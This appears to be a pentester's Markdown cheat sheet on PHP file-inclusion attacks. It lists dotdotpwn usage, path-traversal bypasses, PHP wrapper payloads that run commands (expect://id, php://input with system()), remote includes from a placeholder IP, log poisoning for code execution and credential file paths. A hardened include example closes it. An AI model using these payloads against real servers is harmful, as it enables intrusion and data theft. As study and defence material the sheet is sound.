# php wrappers, LFI

## [dotdotpwn](https://github.com/wireghoul/dotdotpwn)

Note: preinstalled in the latest Kali ISO. Supports the `http`, `ftp` and `tftp` modules.

```bash
dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS
```

## Workarounds

NOTE: **Read the script that performs the vulnerable include** (through the LFI itself) to learn how the parameter is built and filtered before trying bypasses.

* Bypassing filters using `....//`
* Using null byte %00: `/etc/passwd%00`
* URL encoding techniques (double encoding)

### LFI wordlist

* `/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt`

## .php wrappers

```bash
# protocol wrappers
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file

# expect wrapper
# allows running system commands (the expect extension must be installed)
file=expect://id

# input wrapper
file=php://input
# the PHP code is sent as the POST body, e.g.
#   <?php system('id'); ?>   or   <?php shell_exec('id'); ?>

# filter wrappers (read a PHP file's source instead of executing it)
file=php://filter/resource=PHP-FILE
file=php://filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILE
```

## LFI to RCE (linux)

```bash
# with LFI, read the web server access log and then poison it (log poisoning)
# if the user lacks permission to read the log files, try the open file
# descriptors of the current process instead
LFI=/proc/self/fd/{NUMBER}

# once the log file can be read through the LFI > log poisoning
```

## LFI Paths (linux)

```bash
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID_NUMBER/fd/FILE_DESCRIPTOR_NUMBER
/proc/self/environ
/proc/version
/proc/cmdline
```

## LFI Paths (windows)

```bash
C:\Windows\System32\Drivers\etc\hosts
C:\\Windows\\System32\\Drivers\\etc\\hosts
\Windows\System32\Drivers\etc\hosts
\\Windows\\System32\\Drivers\\etc\\hosts
C:\Windows\win.ini
C:\\Windows\\win.ini
\Windows\win.ini
\\Windows\\win.ini
C:\Windows\system.ini
C:\\Windows\\system.ini
\Windows\system.ini
\\Windows\\system.ini
```

## LFI PHP Code Analysis

```php
<?PHP 
	include($_GET["file"]);
?>
```

The above code block includes any value given to the `file` parameter, with no restriction at all.

```php
<?PHP 
	include("downloads/". $_GET['file']); 
?>
```

The above code block includes any value given to the `file` parameter as long as it is inside the `downloads` directory. To bypass, use `../../../<>`.

```php
<?PHP 
	// appends ".php" to the user-supplied value before including it
	include("downloads/" . $_GET['file'] . ".php"); 
?>
```

The above code block includes any value given to the `file` parameter as long as it is inside the `downloads` directory, and appends `.php` to the user-supplied value. To bypass, use `../../../<>` with a value ending in `%00` (null-byte truncation; PHP 5.3.4 and later reject null bytes in include paths).

When the application strips `../` in a single pass, bypass with `....//`: after the substitution it collapses to `../`.
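For the defender's side of the three snippets above, here is an added example (not code from the original page) of a hardened replacement for the `include("downloads/" . $_GET['file'] . ".php")` pattern. It assumes a `downloads/` directory of `.php` files next to the script and that nothing outside it should ever be included; the function name `safe_include_path` is made up for this example.

```php
<?php
// Hardened include: allowlist the name, then canonicalise the path and
// check it is still under the intended directory. Added example; the
// helper name and the downloads/ layout are assumptions.

function safe_include_path(string $userValue, string $baseDir): ?string
{
    // Reject embedded null bytes explicitly rather than relying on PHP's
    // own handling (the %00 truncation trick targets older versions).
    if (strpos($userValue, "\0") !== false) {
        return null;
    }
    // Only accept a plain file name: no slashes, no dots, no scheme.
    // This rejects ../, ....//, php://, expect:// and friends in one step,
    // without any strip-and-retry logic that could be collapsed around.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $userValue)) {
        return null;
    }
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . '/' . $userValue . '.php');
    // realpath() resolves symlinks and ../ and returns false for missing
    // files, so the prefix check below is on canonical paths.
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

$path = safe_include_path($_GET['file'] ?? '', __DIR__ . '/downloads');
if ($path === null) {
    http_response_code(400);
    exit('invalid file');
}
include $path;
```

Keeping `allow_url_include` off in `php.ini` remains the second layer: even if the allowlist were loosened, remote URLs could not be included.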

## RFI PHP Code Analysis

RFI only works when both `allow_url_fopen` and `allow_url_include` are enabled in `php.ini` (`allow_url_include` has no effect without `allow_url_fopen`, and it is off by default).
